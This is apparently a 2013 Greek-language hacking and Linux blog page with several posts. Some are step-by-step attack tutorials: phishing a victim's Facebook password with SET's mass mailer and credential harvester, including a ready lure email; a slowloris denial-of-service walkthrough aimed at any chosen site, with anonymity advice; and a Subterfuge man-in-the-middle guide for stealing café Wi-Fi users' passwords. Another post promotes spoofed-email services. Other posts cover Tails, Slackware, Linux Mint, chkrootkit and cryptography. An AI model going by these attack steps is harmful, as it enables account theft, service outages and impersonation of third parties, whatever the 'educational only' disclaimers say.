!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Δευτέρα 4 Μαρτίου 2013

Credential Harvester Attack Method (LAN) - Backtrack 5 R3 Tutorial

Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector

Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...

Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.



http://(my ip address)
Regards
^C ↵ (Ctrl + C)

Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.

Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τails... Διανομή αποκλειστικά για ανωνυμία και ασφάλεια

Αναφορές στο θέμα Ανωνυμίας και Ασφάλειας δεν θα σταματήσουμε ποτέ να κάνουμε. Όχι τουλάχιστον μεχρι αυτά να γίνουν δεδομένα και δικαίωμα του κάθε χρήστη. Και αυτή τη στιγμή κακά τα ψέματα η ανωνυμία και η ασφάλεια βάλλονται. Οι κυβερνήσεις, αυτοί οι μηχανισμοί βίας, μέσω των υπηρεσιών ασφαλείας κάνουν τα πάντα για να μην έχουν κανένα δικαίωμα στην ανωνυμία οι άνθρωποι.
Θέλεις με δημόσιες κάμερες, οι οποίες στο πρόσχημα της τρομοκρατίας και άλλων τέτοιων χρησιμοποιούνται για άλλους λόγους, θελεις με επιβολή νόμων που επιβάλει την χρήση πιστωτικής κάρτας, με συμβούλια και ελέγχους στην δημοσιογραφία, με δυνάμεις καταστολής και βέβαια με κάθε τρόπο επιβολή αυτών και στο διαδίκτυο.
Βλέπετε το διαδίκτυο είναι το τελευταίο μέρος πλέον όπου καποιος μπορεί ακόμα να μιλήσει ελεύθερα και να ενημερώνει τους ανθρώπους. Και αυτό ενοχλεί τις κυβερνήσεις και το ίδιο το σύστημα, καθώς δείχνει πόσο σάπια και ψεύτικα είναι.
Πρέπει να γίνει κατανοητό στον καθένα πως το δικαίωμα στην ανωνυμία είναι δικαίωμα. Αυτό είναι ανομία και όχι παρανομία, όπως προσπαθούν να πείσουν οι κονδυλοφόροι της “ενημέρωσης” και οι κυβερνητικοί εκπρόσωποι.
Κατανοώ πως ο λεγόμενος καθημερινός χρήστης είναι δύσκολο να ξεχωρίσει κάποια βασικά πράγματα και πως πιστεύει ότι όλα στο διαδίκτυο είναι ρόδινα και ωραία.
Όμως η αλήθεια δεν είναι καθολου έτσι. Οι δυνάμεις καταστολής ψάχνουν και βρίσκουν εξιλαστήρια θύματα, παρουσιάζοντας τα ως τρομοκράτες και ως διασαλευτές της (λεγόμενης) δημόσιας ασφάλειας.
Στο παρελθόν, έχουμε αναφέρει πολλά για το δικαίωμα στην ανωνυμία και την ιδιωτικοτητα. Έχουμε μάλιστα δώσει και ένα… επικό άρθρο με όλα όσα πρέπει να ξέρει και να κάνει καποιος ώστε να έχει αυτά κατά την περιήγηση του στο διαδίκτυο.
Πρέπει πρώτα απ’ όλα να γίνει κατανοητό πως η άρση της ανωνυμίας ξεκινάει από την στιγμή που συνδεόσαστε στο διαδίκτυο και ανοίγετε το λειτουργικό σας σύστημα. Είναι γεγονός πως η Microsoft και τα Windows δεν θέλουν την ανωνυμία και πως όλα μα όλα τα δεδομένα των ανθρώπων που χρησιμοποιούν αυτό το λειτουργικό σύστημα, ταξιδεύουν σε servers της εταιρείας, της CIA/FBI και ανά πάσα στιγμή είναι στη διάθεση οποίας κρατικής υπηρεσίας τα θελήσει.
Ακόμα και οι υποτιθέμενες ιδιωτικές σας συνομιλίες μέσω του Skype καταγράφονται, αποθηκεύονται και ανά πάσα στιγμή μπορούν να χρησιμοποιηθούν εναντίον σας.
Τι και αν δεν είπατε τίποτα κακό, τι και αν έχετε δίκιο, αυτά δεν ενδιαφέρουν καθολου τις δυνάμεις καταστολής. Ακριβώς όπως γίνεται και στην καθημερινότητα. Ρίξτε μια μάτια γύρω σας και δείτε τα υπεροπτικά πρόσωπα των ένστολων που έχουν αυξηθεί ανησυχητικά, οι οποίοι αντιμετωπίζουν τον κάθε άνθρωπο ως εγκληματία, ενώ αυτοί είναι οι… “αθώες περιστερές” και τα πιστά σκυλιά του συστήματος.
Έτσι ακριβώς γίνεται και στο διαδίκτυο και ας μην το μαθαίνετε ποτέ. Οι κυβερνήσεις, μέσω των υπηρεσιών ασφαλείας, θέλουν, απαιτούν τα δεδομένα των ανθρώπων, ώστε να τους… εξηγήσουν τι σημαίνει “δικαιοσύνη”.
Και ας μη πει καποιος ότι ξεφεύγω, επειδή το ίδιο συμβαίνει και στο διαδίκτυο. Υπάρχουν μάτια που παρακολουθούν τα πάντα και εταιρείες (οι λεγόμενοι κολοσσοί) οι οποίοι πρόθυμα και χωρίς δεύτερη κουβέντα δίνουν συνήθως τα δεδομένα και τους ανθρώπους στα νύχια των δυνάμεων καταστολής.
Φυσικά το ίδιο θα κάνει και ο provider σας. Αυτή η εταιρεία δηλαδη η οποία σας παρέχει την πρόσβαση σε ένα κοινωνικό αγαθό όπως το διαδίκτυο, χρεώνοντας σας παράλογα (40 ευρώ τον μήνα ο ΟΤΕ, για παράδειγμα και βέβαια, ακόμα και αν οι κυβερνήσεις “ξεχάσαν”, εμείς δεν ξεχνάμε το βρωμερό παιχνίδι της Vofafone και τις υποκλοπές).
Αν κάποιοι έχετε στραβώσει με τα παραπάνω και τα θεωρείτε υπερβολές, αλλάξτε θέμα η ακόμα καλύτερα αλλάξτε σελίδα. Ένα κλικ μακρυά σας είναι το Facebook και οι εθνικοπατριωτικές σελιδες.
Και έχοντας κάνει ξεκάθαρα κάποια πράγματα, ας περάσουμε και στην ουσία για την ανωνυμία και ιδωτικοτητα στο διαδίκτυο.
Δεν χρειαζεται να έχετε γνώσεις ιδιαίτερες ώστε να επιτύχετε κάτι τέτοιο. Υπάρχουν κάμποσες Linux διανομές που έρχονται έτοιμες για κάτι τέτοιο με τα ανάλογα εργαλεία.

Talis

Μια όμως διανομή του είδους, πιο προσιτή και με όλα τα αναγκαία για ασφάλεια και ανωνυμία είναι το Tails που προέρχεται από τα ακρωνύμια των λέξεων: The Amnesic Incognito Live System.
Η διανομή αυτή δεν απαιτεί καν εγκατάσταση, μα μπορεί να τρέξει live από κάποιο δισκάκι η usb stck.
Παρέχει μια ολοκληρωμένη σειρά ευκολοχρηστων εργαλείων τα οποία προσφέρουν:

Ανώνυμη και ασφαλή περιήγηση στο διαδίκτυο μη αρκούμενη στα όσα κάνει το Tor μα προχωρώντας περισσότερο εις βάθος αρχίζοντας από το ίδιο το σύστημα σας.
Έτσι θα βρείτε εργαλεία για ασφαλή κρυπτογράφηση μα και άμεση καταστροφή των δεδομένων σας σε περίπτωση ανάγκης, ώστε να μην μπορεί να τα ανακτήσει καποιος άλλος.
Αυτό σημαίνει πως πίσω σας δεν αφήνετε ίχνη η πως αυτά είναι πολύ δύσκολο ως σχεδον αδύνατο να ανακτηθούν καθώς απαιτούν μεγάλο κόστος και άπειρο χρόνο.
Η διανομή αυτή, παλιότερα ήταν γνωστή και ως Incognito Linux, βασίζεται στο Debian, είναι μικρή σε μέγεθος και με ένα περιβάλλον προσιτό στον οιονδήποτε.
Το μόνο που έχετε να κάνετε, είναι να την κατεβάσετε (ISO) και να την “κάψετε” σε κάποιο δισκάκι η ακόμα και σε κάποιο usb stick (με το Unetbootin).
Στη συνέχεια εκκινήστε τον υπολογιστή σας από αυτό και έτσι θα μπείτε στο περιβάλλον του Tails, το οποίο σε καμία περίπτωση δεν θα πειράξει η θα έχει κάποια επαφή με το υπάρχον η υπάρχοντα εγκατεστημένα λειτουργικά σας συστήματα.

Το να χρησιμοποιείτε το Tails η όποια άλλη διανομή και εργαλείο ανωνυμίας και να κάνετε login στο Facebook, το Gmail σας και άλλες υπηρεσιες, ΔΕΝ έχει κανένα απολύτως νόημα, καθώς στη πράξη καταργείτε την ανωνυμία σας

Κυριακή 3 Μαρτίου 2013

DoS επίθεση με το BackTrack 5 R3 | Slowloris.pl

Ένα είδος επίθεσης σε κάποιο server είναι η επίθεση DoS (Denial of Service). Για να πραγματοποιήσουμε αυτό υπάρχουν αρκετοί τρόποι (LOIC, HOIC, slowloris κτλ...) Στο παρακάτω απόσπασμα ακολουθεί ένα σεμινάριο DoS επίθεσης με τη χρήση του εργαλείου slowloris στο BackTrack5 R3.
Το πρώτο πράγμα που πρέπει να κάνουμε για πραγματοποιήσουμε αυτό το είδος επίθεσης σε ένα server είναι να βρούμε από το διαδίκτυο το αρχείο slowloris.pl. Το αρχείο αυτό είναι ένας κώδικας και μπορούμε να τον κατεβάσουμε από το link που ακολουθεί:

http://ha.ckers.org/slowloris/slowloris.pl

Αφού ανοίξουμε το link πατάμε επιλογή όλων και δεξί κλικ αντιγραφή. Στη συνέχεια ανοίγουμε ένα κενό έγγραφο κειμένου (gedit), πατάμε επικόλληση και αποθηκεύουμε το έγγραφο στην επιφάνεια εργασίας του BackTrack 5 R3 με το όνομα ''slowloris.pl''.
Αφού κάνουμε αυτό, επόμενο βήμα είναι να βρούμε το στόχο-site που θέλουμε να χτυπήσουμε.
Μετά από αυτό ανοίγουμε ένα terminal και πληκτρολογούμε:

Code:
cd Desktop/ ↵
./slowloris.pl – dns (ip or www.site.com)

Όταν κάνουμε αυτό θα δούμε στην οθόνη να τρέχουν κάποια γράμματα.

Για παράδειγμα
Building Pockets
Building Pockets
Building Pockets
Building Pockets
Building Pockets...
Αυτό σημαίνει ότι η επίθεση έχει αρχίσει...

Τώρα αν προσπαθήσουμε να ανοίξουμε τη σελίδα που χτυπάμε πολύ απλά θα μας δείχνει σφάλμα σύνδεσης στη σελίδα. Όταν σταματήσουμε την επίθεση και ανοίξουμε τη σελίδα τότε θα μπορέσουμε να εισελθουμε σε αυτήν ξανά. Να θυμάστε όσο περισσότερα άτομα χτυπάνε μαζί μια σελίδα τόσο καλύτερο θα είναι το αποτέλεσμα. Μερικοί server όμως που έχουν load balancer πολύ πιθανό η επίθεση DoS να μην πιάσει. Τέλος το slowloris αποτελεί ένα ισχυρό εργαλείο για DoS επιθέσεις όπως επίσης να μη ξεχνάμε πάντα να χρησιμοποιούμε τα κατάλληλα προγράμματα για διαφύλαξη της ανωνυμίας μας. (VPN, proxy, κτλ).

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Παρασκευή 1 Μαρτίου 2013

Backtrack 5 R3 Tutorial - Αυτοματοποιημένη διαδικασία απόκτησης κωδικών πρόσβασης με Subterfuge


Σε αυτό το tutorial θα δούμε πως να αποκτήσουμε κωδικούς πρόσβασης με διαδικασία ΜΙΤΜ (Man in the Middle) χρησιμοποιώντας το Subterfuge.

1) Πρώτα απ'όλα κατεβάζουμε το subterfuge από εδώ
2) Ανοίγουμε ένα τερματικό και πηγαίνουμε στο φάκελο που κατεβάσαμε το αρχείο μας πληκτρολογόντας cd Downloads και στη συνέχεια ls. Η διαδικασία φαίνεται παρακάτω στην εικόνα.
3) Αποσυμπιέζουμε το αρχείο: tar -zxvf (όνομα αρχείου)


4) Στη συνέχεια γράφουμε: cd subterfuge
5) Μετά γράφουμε την παρακάτω εντολή έτσι ώστε να μας ανοίξει το αρχείο ρυθμίσεων της εφαρμογής και να δούμε ποια είναι η εντολή εγκατάστασης του: nano README




6) Αφού κάναμε έλεγχο πληκτρολογούμε: python setup.py install

7) Για να κάνουμε εγκατάσταση της εφαρμογής σε γραφικό περιβάλλον: ./setup.py



8) Επιλέγουμε πλήρης εγκατάσταση...




9) Για να εκκινήσουμε γράφουμε στο τερματικό: subterfuge


10) Ανοίγουμε τον browser και εισάγουμε το link που φαίνεται http://127.0.0.1:80





11) Στη συνέχεια μας ανοίγει ένα παράθυρο με τις επιλογές της εφαρμογής. Παρατηρούμε ότι υπάρχουν πολλές επιλογές για ένα πλήρες penetration test.



12) Στην πάνω δεξιά γωνία της οθόνης γράφει "Start". Κάνουμε κλίκ και στη συνέχεια επιλέγουμε "ΟΚ" στο μήνυμα που εμφανίζεται





13) Ας ρίξουμε μια ματιά στο τερματικό. Όπως βλέπουμε όλα γίνονται με αυτόματο τρόπο και συγκεκριμένα το arp poisoning, ip forwarding, credential harvester και το sslstrip.


14) Τέλος ρίχνω μια ματιά στον browser και παρατηρώ ότι ανάλογα με την κίνηση του δικτύου και ανάλογα σε ποια σελίδα μπαίνουν για παράδειγμα οι χρήστες του ασύρματου δικτύου σε μια καφετέρια με ασύρματο δωρεάν ιντερνετ παίρνω τους κωδικούς πρόσβασης τους όταν μπαίνουν στους λογαριασμούς τους.



ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Slackware Linux 14.0


Μετά από ανάπτυξη πολλών, σχετικά, μηνών και κυκλοφορίας πέντε (5) release candidates (RC), το Slackware Linux Project κυκλοφόρησε μια ακόμα σταθερή έκδοση της διανομής. Αναφερόμαστε βέβαια στο Slackware Linux 14.0. Ο χρόνος ο οποίος χρειάστηκε για την ανάπτυξη και δοκιμή (testing) αυτής της έκδοσης, είναι δεκαεπτά (17) μήνες και είναι ο μεγαλύτερος έως τώρα, στην δεκαεννιάχρονη (19) πορεία αυτής της ιστορικής διανομής με τις τριαντατρείς (33) σταθερές εκδόσεις.


Συνοπτικά μερικά από τα νέα χαρακτηριστικά αυτής της έκδοσης.

  • Πέρασε πλέον σε πυρήνα Linux (kernel-*) της σειράς 3.x, συγκεκριμένα τον 3.2.29, ο οποίος έχει υποστήριξη μακράς διάρκειας (long-term support) από το kernel.org
  • Η συλλογή GNU compilers (gcc) στην έκδοση 4.7.1
  • Τα εκτελέσιμα μπορούν πλέον να «συνδεθούν» με την GNU C Library (glibc) έκδοσης 2.15
  • Διατίθεται το νέο σύστημα X11R7.7, με τον X.Org Server (xorg-server) 1.12.3
  • Το γραφικό περιβάλλον KDE (kde/*) 4.8.5
  • Το γραφικό περιβάλλον XFCE (xfce/*) 4.10 (στο οποίο ο Thunar μπορεί και από/προσαρτά partitions)
  • Για πρώτη φορά διατίθεται ο γνωστός NetworkManager (NetworkManager) του Gnome Project, για προαιρετική, απλούστερη(!) και «γραφική» ρύθμιση των δικτύων!
  • Ο διάσημος εναλλακτικός compiler Clang/LLVM/(llvm) (default στο FreeBSD 10 dev)
  • Στο extra διατίθεται SlackBuild για δημιουργία πακέτου του Google Chrome
  • Στο testing, υπάρχουν έτοιμα αρχεία config’s για όποιους ενδιαφέρονται (γκουχ-γκουχ) να δοκιμάσουν μια μεταγλώττιση/εγκατάσταση πυρήνων Linux, των εκδόσεων 3.4.11, 3.5.4 και 3.6-rc4
  • Διατίθεται για τις αρχιτεκτονικές x86 (32-bit), x86_64 (64-bit) και ARM
Παρόλα αυτά, ο BDFL της διανομής Patrick J. Volkerding, καθησυχάζει τους χρήστες του λέγοντας πως όποιος έχει χρησιμοποιήσει ξανά την διανομή μπορεί να νοιώθει _ακόμα_ το σύστημά του σαν το σπίτι του..!!

Επίσης, αναφέρει πως στο δικτυακό τόπο SlackBuilds.org, διατίθενται όλων των ειδών build scripts για επιπρόσθετο λογισμικό. Και για όποιον χρειάζεται βοήθεια να επισκεφτεί την νέα ιστοσελίδα τεκμηρίωσης, το Slackware Documentation Project.

Σχετικοί σύνδεσμοι

Επίσημη ιστοσελίδα της διανομής: http://slackware.com/ 

Επίσημη ιστοσελίδα της τεκμηρίωσης: http://docs.slackware.com/

Αποκτήστε τη διανομή: http://slackware.com/getslack/ 

Για την ARM αρχιτεκτονική: http://www.armedslack.org/ 

Επιπρόσθετο λογισμικό: http://slackbuilds.org/

Πηγή: osarena.net

Τετάρτη 27 Φεβρουαρίου 2013

Linux Mint 14 -Cinnamon




Το Linux Mint, έχει αρχίσει να μπαίνει σε μια δική του τροχιά ανάπτυξης η οποία έχει πλέον διαφοροποιηθεί από του Ubuntu και σίγουρα όσο προχωρούν οι εκδόσεις η απόσταση αυτή θα μεγαλώνει.
Πριν ελάχιστες ημερες κυκλοφόρησε η νέα του έκδοση 14 και έχοντας ως επίσημο desktop το Cinnamon, την δοκιμάσαμε και πριν την δούμε καλύτερα πιο κάτω, αξίζει να σημειώσω πως η ταχύτητα και η απόδοση που έχει το Mint, συγκριτικά με αυτή του Ubuntu Unity είναι εμφανής από το πρώτο λεπτό, σε όποιον έχει δει και τις διανομές.
Ειλικρινά, αν δεν το έκανα ο ίδιος, θα αδυνατούσα να πιστέψω πως τρέχει live από ένα usb στικακι.

Δοκιμάζοντας το Linux Mint 14-Nadia

Αφού λοιπόν, κατέβηκε γρήγορα το Linux Mint, το “έκαψα” με το Unetbootin σε κάποιο usb στικακι και το boot-αρα, σε ένα ταπεινό laptop:


To πρώτο desktop που θ’ αντικρίσετε, είναι το παρακάτω:


Το Cinnamon πλέον, είναι ένα πλήρες desktop, χρηστικό και φιλικό υπό την έννοια πως θυμίζει το λεγόμενο κλασσικό desktop που έχουν συνηθίσει και οι περισσότεροι χρήστες.
Με το γνωστό εύχρηστο και κατηγορημένο μενού του Mint, δεν θα δυσκολευτεί κανείς να βρει κάποια εφαρμογή, δεν χρειάζεται να πληκτρολογήσει κάτι, καθώς όλα είναι εκεί εύκολα προσβάσιμα, με ένα-δυο κλικ:


Στο πάνελ υπάρχουν οι γνωστές ενδείξεις για άμεση πρόσβαση. χωρίς να χρειάζεται πλοήγηση σε μενού και υπομενού. Επίσης και συντομεύσεις για βασικές εφαρμογές (Firefox, Τερματικό) και αρχεία, υπάρχουν ήδη στο πάνελ:


Στην παρούσα έκδοση, έχουμε πλέον τον Nemo File Manager,ένα fork του Nautilus που αναπτύσσει η ομάδα του Mint, προκειμένου να επιλύσει τις διάφορες ασυμβατότητες που παρουσιάστηκαν:


Από προεπιλογή έχει δυο διαφορετικές επιφάνειες εργασίας και έχετε πρόσβαση σε αυτές με αιώρηση του κέρσορα σας στην επάνω αριστερή γωνία της οθόνης, ενώ μπορείτε να προσθέσετε, όσες ακόμα επιθυμείτε.
Επίσης μπορείτε να σύρετε παράθυρα από την μια επιφάνεια στην άλλη η και να τα κλείσετε:


Η εναλλαγή ανάμεσα σε εφαρμογές μπορεί να γίνει και με ένα ανανεωμένο,ρυθμιζόμενο και ωραίο Alt-Tab, τ’ οποίο δείχνει προεπισκοπήσεις ανοικτών εφαρμογών και εικονίδια:


Όλες οι γνωστές εφαρμογές είναι ήδη εγκατεστημένες και εύκολα, όπως είπαμε, μπορεί να τις βρει ο καθένας στο μενού:

 


Οι ρυθμίσεις συστήματος οι γνωστές του Gnome, μα στη νέα έκδοση:


Να προσθέσουμε ακόμα πως έχει ανανεωθεί και βελτιωθεί το Mint Softare Manager, τ’ οποίο πλέον χρησιμοποιεί το δικό του apt client και όχι το aptdaemon.
Και βέβαια υπάρχει πλέον ο MDM, o login manager του Mint, ο οποίος είναι ένα fork του παλιοί που υπήρχε στο Gnome 2x.
Εν κατακλείδι, το Linux Mint 14-Cinnamon, είναι ένα πληρέστατο,ταχύτατο και απολύτως φιλικό desktop, τ’ οποίο θα σύστηνα ανεπιφύλακτα σε νέους χρήστες που θέλουν να δοκιμάσουν Linux.
Μα σε κάθε περίπτωση αξίζει να το δει ο καθένας, ιδιαίτερα όσοι βρίσκουν βαρύ και δύσχρηστο το Unity.
Τέλος να πουμε, πως το Mint έχει και μια πολύ καλή ενσωμάτωση του Mate desktop (με ξεχωριστή έκδοση) η οποία “αναβιώνει”, το παλιό κλασσικό Gnome 2x desktop.

Δείτε όλα τα νέα χαρακτηριστικά της έκδοσης 14-Νadia.



(923,8 MB είναι η έκδοση με Cinnamon, επομένως αν δεν το “κάψετε” σε usb, θα χρειαστείτε dvd).

H Ελληνική Κοινότητα του Linux Mint, για υποστήριξη.

Anti-Virus Forensics Tool - Backtrack 5 R3 Tutorial

Γεια σας... Όπως είναι γνωστό σε όλους από τότε που φτιάχτηκαν οι υπολογιστές άρχισαν να δημιουργούνται και ιοί που βλάπτου το κάθε λειτουργικό σύστημα έτσι ώστε να δυσλειτουργεί. Αυτό δεν ισχύει μόνο για το λειτουργικό των windows. Σε όλα τα λειτουργικά υπάρχουν ιοί ακόμα και στα linux η διαφορά είναι ότι κάποια λειτουργικά συστήματα είναι πιο ανθεκτικά σε προσβολές από ιούς. Σε αυτό τον εκπαιδευτικό οδηγό θα αναλύσουμε ένα αρκετά χρήσιμο εργαλείο που υπάρχει στις διανομές των Backtrack 5 και είναι το chkrootkit (Check Rootkit). Υπάρχει ακόμα ένα εργαλείο αλλά αυτό θα αναλυθεί σε επόμενο tutorial. 
Το chkrootkit είναι ένα πρόγραμμα για συστήματα τύπου unix και συγκεκριμένα υπάρχει στη λίστα εργαλείων του backtrack 5 και το οποίο έχει στόχο να βοηθάει τον διαχειριστή να ελέγχει το σύστημα όχι μόνο για τυχόν ιούς αλλά και για δυσλειτουργίες του συστήματος για τυχόν προσβολές του συστήματος από τρίτους κατά την περιήγηση στο ιντερνετ. Είναι να φανταστούμε κάτι όπως το ccleaner των windows αλλά έχει επιπρόσθετο antivirus, antispam κτλ. Αποτελεί ένα πολύ χρήσιμο εργαλείο για κάποιον που ξέρει καλά να χρησιμοποιεί στο έπακρο τις τεράστιες δυνατότητες που παρέχει το backtrack 5 στους χρήστες του.
Παρακάτω θα δείξουμε πώς το χρησιμοποιούμε:

Βήμα 1. Πρώτα απ'όλα ανοίγουμε ένα τερματικό από την επιφάνεια εργασίας του Backtrack 5 R3 και πληκτρολογούμε: cd /pentest/forensics/chkrootkit/
Βήμα 2. Στη συνέχεια πληκτρολογούμε:  ./chkrootkit –help (περιμένουμε λίγο και μας ανοίγει ένα κείμενο με τις εντολές του εν λόγο εργαλείου).



Βήμα 3. Τώρα πληκτρολογόντας την εντολή ./chkrootkit -l στο τερματικό το αφήνουμε να κάνει τεστ.




Βήμα 4. Σε αυτό το βήμα ελέγχουμε αν οι φάκελοι μας στο σύστημα έχουν προσβληθεί από τρίτους. Αυτό γίνεται πληκτρολογόντας τις δυο παρακάτω εντολές
  • ./chkrootkit login
  • ./chkrootkit sshd

Βήμα 5. Για να κάνουμε ένα πλήρες τεστ σε όλο το σύστημα μας πληκτρολογούμε: ./chkrootkit και όπως φαίνεται παρακάτω στις εικόνες γίνεται γενικός έλεγχος και στο τέλος προκύπτει μια λίστα με τα αποτελέσματα.





Τρίτη 26 Φεβρουαρίου 2013

Κάντε πλάκα σε κάποιον φίλο σας στέλνοντας του "ψεύτικο" email




Γειά σε όλους. Στο σημερινό tutorial θα σας δείξω πώς μπορούμε να στείλουμε ένα "ψεύτικο" mail σε κάποιον γνωστό μας και να του κάνουμε πλάκα. Μπορούμε να βάλουμε αποστολέα, mail "θύματος", θέμα, κείμενο κτλ και οτιδήποτε άλλο θέλουμε. Για παράδειγμα θέλω να προσποιηθώ έναν διάσημο και να κάνω πλάκα σε ένα φίλο μου. Γράφω το ψεύτικο mail μου και τα ψεύτικα στοιχεία μου.


H διεύθυνση είναι η παρακάτω: http://emkei.cz/



Επίσης άλλες τρεις σελίδες που μπορούμε να στείλουμε ψεύτικο mail σε κάποιον γνωστό μας και να του κάνουμε πλάκα είναι οι παρκάτω...

sendanonymousemail.net
 

anonymouse.org
 

send-email.org

Εισαγωγή στην Κρυπτογραφία...

Γεια σας... Σε αυτό το εκπαιδευτικό άρθρο θα ασχοληθούμε με την έννοια της κρυπτογραφίας λέγοντας μερικά εισαγωγικά για αυτή την έννοια. Από το μακρινό παρελθόν οι ασφαλές μεταδόσεις πληροφοριών και μηνυμάτων απασχόλησε τους ανθρώπους και εξακολουθούν να τους απασχολούν έως σήμερα δηλ. την μετάδοση πληροφοριών χωρίς να γίνεται αντιληπτή από τρίτους, η εξασφάλιση της δυνατότητας να μην μπορεί να διαβαστεί το μήνυμα στην περίπτωση που η μετάδοση γίνει αντιληπτή καθώς και η απόδειξη της αυθεντικής αποστολής ενός μηνύματος. Τα προβλήματα αυτά, θα εξακολουθούν να υπάρχουν, όσο θα υπάρχουν άνθρωποι που θα προσπαθούν να προστατέψουν τα δικαιώματά τους και κάποιοι που θα προσπαθούν να τα παραβιάσουν.
Στη σύγχρονη εποχή, τα προβλήματα αυτά μεταφέρονται στο χώρο των ψηφιακών δεδομένων. Σύγχρονες υπολογιστικές μηχανές, με υψηλές δυνατότητες επεξεργασίας και αποθήκευσης πληροφοριών, χρησιμοποιούνται τόσο για να εξασφαλίζουν τη νομιμότητα όσο και για να την παρακάμπτουν.
Λόγοι οι οποίοι καθιστούν την ασφάλεια στην ηλεκτρονική επικοινωνία επιτακτική, είναι η ευκολία που παρέχεται μέσω ενός ανοικτού δικτύου, όπως είναι το Internet στην:
  • παρακολούθηση της επικοινωνίας από τρίτους- ωτακουστές (eavesdroppirs)
  • αλλοίωση του περιεχομένου του μεταφερόμενου μηνύματος-ψευδές μήνυμα (fake message)
  • η όχι πάντα δυνατή εξακρίβωση της ταυτότητας των επικοινωνούντων μερών ιδιωτικότητα (privacy) καθιστά πιθανή μία επίθεση πλαστοπροσωπίας (impersonation).
Οι απειλές (threats) ασφάλειας δικτύου χωρίζονται σε δύο κατηγορίες. Οι παθητικές απειλές, που μερικές φορές αναφέρονται ως παρακολούθηση (eavesdropping)τ περιλαμβάνουν απόπειρες από έναν επιτιθέμενο να αποκτήσει πληροφορία σχετικά με το μήνυμα που διακινείται σε μία επικοινωνία. Οι ενεργητικές απειλές περιλαμβάνουν κάποια τροποποίηση των μεταδιδόμενων δεδομένων ή τη δημιουργία ψεύτικων μεταδόσεων.
Το πιο σημαντικό αυτοματοποιημένο εργαλείο, με διαφορά, για ασφάλεια δικτύου και επικοινωνιών είναι η κρυπτογράφηση. Με συμβατική κρυπτογράφηση, τα δύο μέρη μοιράζονται ένα μοναδικό κλειδί κρυπτογράφησης/ αποκρυπτογράφησης. Η κυριότερη πρόκληση με τη συμβατική κρυπτογράφηση είναι η διανομή και η προστασία των κλειδιών. Ένα σχήμα κρυπτογράφησης δημόσιου κλειδιού περιλαμβάνει δύο κλειδιά, ένα για κρυπτογράφηση και ένα για αποκρυπτογράφηση. Το ένα από τα κλειδιά διατηρείται από τον ιδιοκτήτη κρυφό και το άλλο είναι δημόσιο.
